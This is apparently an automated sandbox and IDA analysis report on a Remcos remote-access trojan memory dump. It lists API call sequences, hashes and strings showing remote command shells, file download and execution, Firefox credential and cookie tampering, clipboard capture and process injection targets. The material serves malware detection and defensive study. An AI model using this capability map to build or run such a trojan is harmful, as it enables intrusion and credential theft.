358 40f11d-40f154 call 4344ea call 401e65 call 401fab CreateThread 347->358 368 40f1cc-40f1df call 401e65 call 401fab 357->368 369 40f16e-40f1c7 call 401e65 call 401fab call 401e65 call 401fab call 40d9e8 call 401f13 call 401f09 CreateThread 357->369 358->357 379 40f1e1-40f215 call 401e65 call 401fab call 401e65 call 401fab call 43baac call 40c162 368->379 380 40f21a-40f23e call 41b60d call 401f13 call 401f09 368->380 369->368 379->380 402 40f240 380->402 403 40f243-40f256 CreateThread 380->403 402->403 404 40f264-40f26b 403->404 405 40f258-40f262 CreateThread 403->405 408 40f279-40f280 404->408 409 40f26d-40f277 CreateThread 404->409 405->404 412 40f282-40f285 408->412 413 40f28e 408->413 409->408 415 40f287-40f28c 412->415 416 40f2cc-40f2e7 call 401fab call 4134ff 412->416 418 40f293-40f2c7 call 402093 call 4052fd call 402093 call 41b4ef call 401fd8 413->418 415->418 416->157 427 40f2ed-40f32d call 41bc5e call 401f04 call 41361b call 401f09 call 401f04 416->427 418->416 443 40f346-40f34b DeleteFileW 427->443 444 40f34d 443->444 445 40f32f-40f332 443->445 444->126 445->126 446 40f334-40f341 Sleep call 401f04 445->446 446->443
                    APIs
                      • Part of subcall function 0041CB50: LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB65
                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB6E
                      • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB88
                      • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CB9A
                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB9D
                      • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CBAE
                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBB1
                      • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040E9E1), ref: 0041CBC3
                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBC6
                      • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040E9E1), ref: 0041CBD2
                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBD5
                      • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBE9
                      • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBFD
                      • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040E9E1), ref: 0041CC0E
                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC11
                      • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC25
                      • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC39
                      • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC4D
                      • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC61
                      • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
                      • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC75
                      • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040E9E1), ref: 0041CC83
                    • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe,00000104), ref: 0040E9EE
                      • Part of subcall function 00410F37: __EH_prolog.LIBCMT ref: 00410F3C
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                    • String ID: SG$ SG$8SG$8SG$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe$Exe$Inj$PSG$Remcos Agent initialized$Software\$User$dMG$del$del$exepath$licence$license_code.txt$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG
                    • API String ID: 2830904901-2501106381
                    • Opcode ID: 9b1241e9863c6c72b945d3650d91b2d8199091da366b898b2edbbd996a0c1519
                    • Instruction ID: d4e128c763ae9979da4f7e35a5cae12564b96cb69b39ecb6445d524eb2b23fe8
                    • Opcode Fuzzy Hash: 9b1241e9863c6c72b945d3650d91b2d8199091da366b898b2edbbd996a0c1519
                    • Instruction Fuzzy Hash: 6332D860B043412BDA24B7729C67B6E26994F81748F50483FB9467B2E3EFBC4D45839E

                    Control-flow Graph

                    APIs
                    • WaitForSingleObject.KERNEL32(?,000000FF,00000000,00474EF8,PkGNG,00000000,00474EF8,00404CA8,00000000,?,?,?,00474EF8,?), ref: 00404E38
                    • SetEvent.KERNEL32(?), ref: 00404E43
                    • FindCloseChangeNotification.KERNELBASE(?), ref: 00404E4C
                    • closesocket.WS2_32(?), ref: 00404E5A
                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404E91
                    • SetEvent.KERNEL32(?), ref: 00404EA2
                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404EA9
                    • SetEvent.KERNEL32(?), ref: 00404EBA
                    • CloseHandle.KERNEL32(?), ref: 00404EBF
                    • CloseHandle.KERNEL32(?), ref: 00404EC4
                    • SetEvent.KERNEL32(?), ref: 00404ED1
                    • CloseHandle.KERNEL32(?), ref: 00404ED6
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseEvent$HandleObjectSingleWait$ChangeFindNotificationclosesocket
                    • String ID: PkGNG
                    • API String ID: 2403171778-263838557
                    • Opcode ID: 87d744648c5afa45b50529b6b6d14d146fbf4d1d8295755f98280c9be6f36435
                    • Instruction ID: 0c11cd9b042c69dc9d4dd2828563f6d61870a883144e53252efabab5b24bcc37
                    • Opcode Fuzzy Hash: 87d744648c5afa45b50529b6b6d14d146fbf4d1d8295755f98280c9be6f36435
                    • Instruction Fuzzy Hash: BF21E871104B04AFDB216B26DC49B27BBA1FF40326F104A2EE2E211AF1CB75B851DB58

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 473 448566-44857a 474 448587-4485a2 LoadLibraryExW 473->474 475 44857c-448585 473->475 476 4485a4-4485ad GetLastError 474->476 477 4485cb-4485d1 474->477 478 4485de-4485e0 475->478 479 4485bc 476->479 480 4485af-4485ba LoadLibraryExW 476->480 481 4485d3-4485d4 FreeLibrary 477->481 482 4485da 477->482 483 4485be-4485c0 479->483 480->483 481->482 484 4485dc-4485dd 482->484 483->477 485 4485c2-4485c9 483->485 484->478 485->484
                    APIs
                    • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,?,00000000,00000000,?,0044850D,?,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue), ref: 00448598
                    • GetLastError.KERNEL32(?,0044850D,?,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000,00000364,?,004482E7), ref: 004485A4
                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044850D,?,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000), ref: 004485B2
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: LibraryLoad$ErrorLast
                    • String ID:
                    • API String ID: 3177248105-0
                    • Opcode ID: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
                    • Instruction ID: d5df962f837ff7629ef00c7a8b4dcab40ba3e58d8e4ddb8b40c265455ff02ab4
                    • Opcode Fuzzy Hash: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
                    • Instruction Fuzzy Hash: AA012832602322FBD7214B289C4495B7798AB50B61B20053AFD05D3241DF34CD01CAE8

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 486 40d069-40d095 call 401fab CreateMutexA GetLastError
                    APIs
                    • CreateMutexA.KERNELBASE(00000000,00000001,00000000,0040EC08,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0040D078
                    • GetLastError.KERNEL32 ref: 0040D083
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateErrorLastMutex
                    • String ID: SG
                    • API String ID: 1925916568-3189917014
                    • Opcode ID: 801f4fab6620dad4192684c1acb97daf4a6912092659b95b34e50827bd09c0e4
                    • Instruction ID: 95155ffd2f5cf2c34283977deb482d2843c3ccfb5002447f486bda260673b364
                    • Opcode Fuzzy Hash: 801f4fab6620dad4192684c1acb97daf4a6912092659b95b34e50827bd09c0e4
                    • Instruction Fuzzy Hash: 18D012B0604701EBD7181770ED5975839959744702F40487AB50BD99F1CBAC88908519

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 489 4484ca-4484f4 490 4484f6-4484f8 489->490 491 44855f 489->491 492 4484fe-448504 490->492 493 4484fa-4484fc 490->493 494 448561-448565 491->494 495 448506-448508 call 448566 492->495 496 448520 492->496 493->494 499 44850d-448510 495->499 498 448522-448524 496->498 500 448526-448534 GetProcAddress 498->500 501 44854f-44855d 498->501 502 448541-448547 499->502 503 448512-448518 499->503 504 448536-44853f call 43436e 500->504 505 448549 500->505 501->491 502->498 503->495 506 44851a 503->506 504->493 505->501 506->496
                    APIs
                    • GetProcAddress.KERNEL32(00000000,?), ref: 0044852A
                    • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00448537
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc__crt_fast_encode_pointer
                    • String ID:
                    • API String ID: 2279764990-0
                    • Opcode ID: 8089c10b092d0b8b49c4e4c687cc442f2ac99aa31dc0a9ae19eeba6ee39a8a7d
                    • Instruction ID: 198cd69cd453a5762926ca534f03dc7b1e1ac857a4a5158ec5eb6717dc05f104
                    • Opcode Fuzzy Hash: 8089c10b092d0b8b49c4e4c687cc442f2ac99aa31dc0a9ae19eeba6ee39a8a7d
                    • Instruction Fuzzy Hash: C3113A37A00131AFEB21DE1CDC4195F7391EB80724716452AFC08AB354DF34EC4186D8

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 509 40165e-401664 510 401666-401668 509->510 511 401669-401674 509->511 512 401676 511->512 513 40167b-401685 511->513 512->513 514 401687-40168d 513->514 515 4016a8-4016a9 call 4344ea 513->515 514->515 517 40168f-401694 514->517 518 4016ae-4016af 515->518 517->512 519 401696-4016a6 call 4344ea 517->519 520 4016b1-4016b3 518->520 519->520
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: dd3aabd753e8fbc850dd588cbaeb9a0baf8afa37155383fde8690b9b823aeb90
                    • Instruction ID: 20740d68f627359004b4f50e822579efa7e6dd26000e0d34fcfb16e84f8f3500
                    • Opcode Fuzzy Hash: dd3aabd753e8fbc850dd588cbaeb9a0baf8afa37155383fde8690b9b823aeb90
                    • Instruction Fuzzy Hash: 6EF0E2706042015BDB1C8B34CD60B2A36955B84315F288F3FF01AD61E0C73EC8918A0D

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 537 446137-446143 538 446175-446180 call 4405dd 537->538 539 446145-446147 537->539 546 446182-446184 538->546 541 446160-446171 RtlAllocateHeap 539->541 542 446149-44614a 539->542 543 446173 541->543 544 44614c-446153 call 445545 541->544 542->541 543->546 544->538 549 446155-44615e call 442f80 544->549 549->538 549->541
                    APIs
                    • RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocateHeap
                    • String ID:
                    • API String ID: 1279760036-0
                    • Opcode ID: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
                    • Instruction ID: 4903450aafda00484806ba385278610c2731405ed8485190d5fd86014b6ab98c
                    • Opcode Fuzzy Hash: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
                    • Instruction Fuzzy Hash: 92E0ED3120062577FB2226669D05B5B365D9F033A2F160127EC0AA2283DF7CCC0081EF
                    APIs
                    • SetEvent.KERNEL32(?,?), ref: 00407CB9
                    • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407D87
                    • DeleteFileW.KERNEL32(00000000), ref: 00407DA9
                      • Part of subcall function 0041C291: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00474EE0,?), ref: 0041C2EC
                      • Part of subcall function 0041C291: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00474EE0,?), ref: 0041C31C
                      • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C371
                      • Part of subcall function 0041C291: FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3D2
                      • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3D9
                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                      • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,00401A45,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000), ref: 00404B47
                      • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000,?,?,?,?,?,00401A45), ref: 00404B75
                    • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00408197
                    • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00408278
                    • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084C4
                    • DeleteFileA.KERNEL32(?), ref: 00408652
                      • Part of subcall function 0040880C: __EH_prolog.LIBCMT ref: 00408811
                      • Part of subcall function 0040880C: FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
                      • Part of subcall function 0040880C: __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
                      • Part of subcall function 0040880C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
                    • Sleep.KERNEL32(000007D0), ref: 004086F8
                    • StrToIntA.SHLWAPI(00000000,00000000), ref: 0040873A
                      • Part of subcall function 0041C9E2: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CAD7
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                    • String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
                    • API String ID: 1067849700-181434739
                    • Opcode ID: ee20889b26462be3d37d60383eaca84b38c4e413c047457fbe9ae68671e6accb
                    • Instruction ID: 75e26f7f6c3f3dbd7fc3c9379f58c72dc3a715cd35b24c1fb8b7d51949cc7e38
                    • Opcode Fuzzy Hash: ee20889b26462be3d37d60383eaca84b38c4e413c047457fbe9ae68671e6accb
                    • Instruction Fuzzy Hash: FE427F71A043016BC604FB76C95B9AE77A5AF91348F40093FF542671E2EE7C9A08879B
                    APIs
                    • __Init_thread_footer.LIBCMT ref: 004056E6
                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                    • __Init_thread_footer.LIBCMT ref: 00405723
                    • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660BC,00000000), ref: 004057B6
                    • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                    • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                    • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
                    • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                      • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                    • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90,004660C0,00000062,004660A4), ref: 004059E4
                    • Sleep.KERNEL32(00000064,00000062,004660A4), ref: 004059FE
                    • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                    • CloseHandle.KERNEL32 ref: 00405A23
                    • CloseHandle.KERNEL32 ref: 00405A2B
                    • CloseHandle.KERNEL32 ref: 00405A3D
                    • CloseHandle.KERNEL32 ref: 00405A45
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                    • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                    • API String ID: 2994406822-18413064
                    • Opcode ID: ff9017fe4a47b23c9c3faeacfcf4d74826474996782d69eafc0bdbb16b5f5ff1
                    • Instruction ID: 70e6a120cd26ef4d63fea04585a98dfb86eec3f3f3d93349c630b188a9e88b71
                    • Opcode Fuzzy Hash: ff9017fe4a47b23c9c3faeacfcf4d74826474996782d69eafc0bdbb16b5f5ff1
                    • Instruction Fuzzy Hash: 8891E471604604AFD711FB36ED42A6F369AEB84308F01443FF989A62E2DB7D9C448B5D
                    APIs
                    • GetCurrentProcessId.KERNEL32 ref: 00412106
                      • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                      • Part of subcall function 00413877: RegSetValueExA.ADVAPI32(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
                      • Part of subcall function 00413877: RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB
                    • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00412146
                    • CloseHandle.KERNEL32(00000000), ref: 00412155
                    • CreateThread.KERNEL32(00000000,00000000,004127EE,00000000,00000000,00000000), ref: 004121AB
                    • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041241A
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                    • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                    • API String ID: 3018269243-13974260
                    • Opcode ID: d6daba7efe88dd7c886cc9b50d5ab07a0a3d3aefa5ec7567085e39cb97412374
                    • Instruction ID: 8205490d34a3093c97c97cf0412c87f535f0d81ed9353c04b1464aab831027f3
                    • Opcode Fuzzy Hash: d6daba7efe88dd7c886cc9b50d5ab07a0a3d3aefa5ec7567085e39cb97412374
                    • Instruction Fuzzy Hash: 2671813160430167C614FB72CD579AE73A4AF90308F50057FB546A61E2FFBC9949C69E
                    APIs
                    • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBAF
                    • FindClose.KERNEL32(00000000), ref: 0040BBC9
                    • FindNextFileA.KERNEL32(00000000,?), ref: 0040BCEC
                    • FindClose.KERNEL32(00000000), ref: 0040BD12
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$CloseFile$FirstNext
                    • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                    • API String ID: 1164774033-3681987949
                    • Opcode ID: cc2b906fffab3f5d65509244bf78c58c3969fa81e43ac990ef7529a7089f2592
                    • Instruction ID: 0369a90be492857ee26322cec2c2e6bc6ddf3692cf68474a737f8ca2a3b0d98c
                    • Opcode Fuzzy Hash: cc2b906fffab3f5d65509244bf78c58c3969fa81e43ac990ef7529a7089f2592
                    • Instruction Fuzzy Hash: 13516E3190421A9ADB14F7B2DC56DEEB739AF11304F10057FF406721E2EF785A89CA89
                    APIs
                    • OpenClipboard.USER32 ref: 004168C2
                    • EmptyClipboard.USER32 ref: 004168D0
                    • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004168F0
                    • GlobalLock.KERNEL32(00000000), ref: 004168F9
                    • GlobalUnlock.KERNEL32(00000000), ref: 0041692F
                    • SetClipboardData.USER32(0000000D,00000000), ref: 00416938
                    • CloseClipboard.USER32 ref: 00416955
                    • OpenClipboard.USER32 ref: 0041695C
                    • GetClipboardData.USER32(0000000D), ref: 0041696C
                    • GlobalLock.KERNEL32(00000000), ref: 00416975
                    • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                    • CloseClipboard.USER32 ref: 00416984
                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                    • String ID: !D@
                    • API String ID: 3520204547-604454484
                    • Opcode ID: 3da19db2da9e38382dfa1a35b9112d29995025b8f82a0e1631b12ced5ccb0bf8
                    • Instruction ID: 9e7c9e91df33a813dd3aefbd505e3631e00017b2d00f6ad0929271c723fa7fba
                    • Opcode Fuzzy Hash: 3da19db2da9e38382dfa1a35b9112d29995025b8f82a0e1631b12ced5ccb0bf8
                    • Instruction Fuzzy Hash: 9F212171604301DBD714BB71DC5DABE36A9AF88746F40043EF946921E2EF3C8D45C66A
                    APIs
                    • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDAF
                    • FindClose.KERNEL32(00000000), ref: 0040BDC9
                    • FindNextFileA.KERNEL32(00000000,?), ref: 0040BE89
                    • FindClose.KERNEL32(00000000), ref: 0040BEAF
                    • FindClose.KERNEL32(00000000), ref: 0040BED0
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$Close$File$FirstNext
                    • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                    • API String ID: 3527384056-432212279
                    • Opcode ID: 10bf6c217e0b25296ff8c4f6571a9877a80f89d81c2766d0b614c08461d6f91f
                    • Instruction ID: daa8673b40617291cefb90f55d029d970aaced9502edc59260dc825ad40fac9f
                    • Opcode Fuzzy Hash: 10bf6c217e0b25296ff8c4f6571a9877a80f89d81c2766d0b614c08461d6f91f
                    • Instruction Fuzzy Hash: 38417D3190021AAADB04F7A6DC5A9EEB769DF11704F50017FF506B20D2EF385A46CA9E
                    APIs
                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F48E
                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F4B9
                    • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F4D5
                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F554
                    • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00475338), ref: 0040F563
                      • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                      • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                    • CloseHandle.KERNEL32(00000000,?,00475338), ref: 0040F66E
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                    • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                    • API String ID: 3756808967-1743721670
                    • Opcode ID: b1e1f41d80490b315896909958d9242b500036c9ac5089c02299af30cc885f9c
                    • Instruction ID: b3f00c97eb68dcc530bbf6735eb7028ff3362e05d7342ed3a56d945b0ce45bff
                    • Opcode Fuzzy Hash: b1e1f41d80490b315896909958d9242b500036c9ac5089c02299af30cc885f9c
                    • Instruction Fuzzy Hash: F6715E705083419BC724FB21D8959AEB7A5AF90348F50083FF586631E3EF78994ECB5A
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: 0$1$2$3$4$5$6$7$VG
                    • API String ID: 0-1861860590
                    • Opcode ID: b5a7de883cd012ce8913fa8e37131401e824a11eb2676ecb59610ee39723a0e8
                    • Instruction ID: 08acf1e0be570df0aadc768861284cd9b307e7e5fc43d41925289fb9f64992c1
